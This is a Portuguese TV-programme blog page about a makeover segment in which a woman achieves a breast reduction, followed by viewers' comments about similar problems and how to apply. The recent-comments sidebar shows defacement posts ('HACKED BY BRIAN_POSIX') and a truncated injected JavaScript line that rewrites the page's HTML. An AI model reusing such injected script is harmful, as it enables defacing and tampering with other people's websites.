Elisabete Soares recorreu ao LOOK MAIS MULHER, pois desejava reduzir o peito e perder peso. O sonho de fazer uma redução mamária existia desde os 11 anos. Para além da questão estética, o peito demasiado grande resultou em vários problemas de saúde. Desanimada e sem condições financeiras para fazer perder o peso que lhe possibiltasse fazer a operação tão desejada, pediu ajuda ao Look Mais Mulher. Hoje em dia a Elisabete é uma mulher rejuvenescida, confiante e de bem consigo mesma. Conheça esta transformação no Mais Mulher desta terça-feira.

 

 

 

 



carla ferreira @ 19:40

Ter, 26/07/11

 

Tenho o mesmo sonho desta senhora que vi no programa hoje...Desde os 15 anos que detesto o meu fisico por ter um peito grande e nem me preocupo com dietas porque quanto mais emagraço mais se nota o peito. nao tenho uma unica peça de vesturário abaixo do M e XL porque sao peças largas onde tento esconder o peito.

Manuela Borges @ 20:27

Ter, 26/07/11

 

Ola Boa Tarde. Desejava saber como me poderia candidatar. Obrigado

Liliana Nunes @ 22:42

Ter, 26/07/11

 

Hoje quando cheguei a casa do trabalho, liguei a Tv no canal Sic Mulher, onde estava a dar o vosso programa, e descobri uma rubrica maravilhosa.." Look Mais Mulher", e pensei automaticamente em candidatar-me... Desde de pequena que tenho um pequeno "problema", não tenho tornozelos...a minha perna é toda gorda, já li alguns artigos na internet e a solução passa apenas por lipoaspiração...isto não é um caso comum, não conheço nenhuma mulher com as pernas assim...por isso gostava muito que me dessem a oportunidade de me candidatar...gostava que me enviassem o vosso email.
Obrigado.

alexandra @ 10:14

Qua, 27/07/11

 

o sonho por vezes torna-se realidade...tenho 35 anos, e também tenho o peito grande e o meu grande sonho era não ter peito mesmo nenhum, nada...casei, tive duas filhas e toda a gente dizia que a dar de mamar o peito ficava mais pequeno ....a mim isso não me aconteceu...tenho problemas de costas e uma hernia agravados por causa do peso do peito...quando vejo as raparigas a quererem aumentar o peito por causa da auto estima, etc, até fico doente...não sabem o que é ter de andar com soutiens grandes, as mamas molhadas debaixo do soutien com a transpiração, o desconforto, não puder usar alçinhas ou tops...enfim foi um desabafo...quando houver mais look mulher eu estou na fila, vou ultrapassar esta minha vergonha e expor me num programa.

madalena @ 11:12

Qua, 27/07/11

 

Gosto muito de ver o Programa da Ana Rita Clara, embora por questões de trabalho não tenha a disponibilidade que gostaria de ter para ver o programa. Ontem quando liguei a televisão e mudei para a Sic Mulher deparei-me com a coincidência de estar a dar uma reportagem que ia ao encontro de algo que se passa comigo e que me anda a atormentar psicologicamente há muitos anos e me está a pôr muito ansiosa, triste e que me provoca muita insegurança e falta de auto-estima que tem a ver com o facto de ter um peito muito grande e ter muita vontade de fazer uma redução mamária. Tenho 43 anos e sempre tive o peito grande o que tem causado e agravado dores nas costas e nos ombros derivado ao peso que a alça do soutien causa mas também muitos problemas de auto-estima. Tenho uma estatura pequena e sempre desejei ter um peito proporcional ao meu corpo. Sempre tive muitos complexos com esta minha particularidade mas por outro lado sempre tive muito medo ao pensar na cirurgia pois falava-se em ser uma intervenção com grandes riscos e uma recuperação muito difícil. Ao longo dos tempos tenho ouvido outras versões sobre estas cirurgias e claro com a evolução da medicina tudo vai melhorando felizmente, mas existe outro problema, fazer esta operação através de um hospital público é difícil e quando possível esperam-se anos, e por outro lado através de um hospital privado custa uma fortuna o que dificulta muito pelo menos no meu caso, pois falam em valores impensáveis para mim. Ontem ao ver o vosso programa e principalmente ao ver os resultados surgiu-me uma luz ao fundo do túnel e pensei que talvez fosse possível acreditar e confesso que por vários motivos e com as dificuldades que me envolvem e que de alguma forma envolvem todas as pessoas do nosso país e não só, estando o negativismo a tornar-se um mal geral, neste momento torna-se muito difícil acreditar seja naquilo que for e ter animo positivo e esperança para o futuro. Não sei quais são as hipóteses de eu ser seleccionada para ter esta felicidade tal como a candidata do programa de ontem (26/07/2011) teve. Mas vou ficar na expectativa e com esperança de ter a mesma sorte que ela.
Obrigada

Madalena Ribeiro

Ana Cristina Salgado @ 14:34

Qui, 28/07/11

 

Gostaria de saber como me posso candidatar. Tenho problemas de coluna, e muitas dores no pescoço Sou casada a 25 anos e á mais de 20 que o meu marido não me vê nua da cintura para cima. Tenho muitos complexos.

Ana Isabel @ 09:12

Sex, 29/07/11

 

Adorei o programa e gostava de saber como posso candidatar-me, pois tal como outras mulheres tenho alguns complexos.


Tecnologia de Bolso @ 14:31

Sex, 29/07/11

 

Boa tarde,

Para concorrer ao "Look Mais Mulher", tem de enviar em e-mail para maismulher@sic.pt,
com a sua história e fotografias.

Obrigado

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO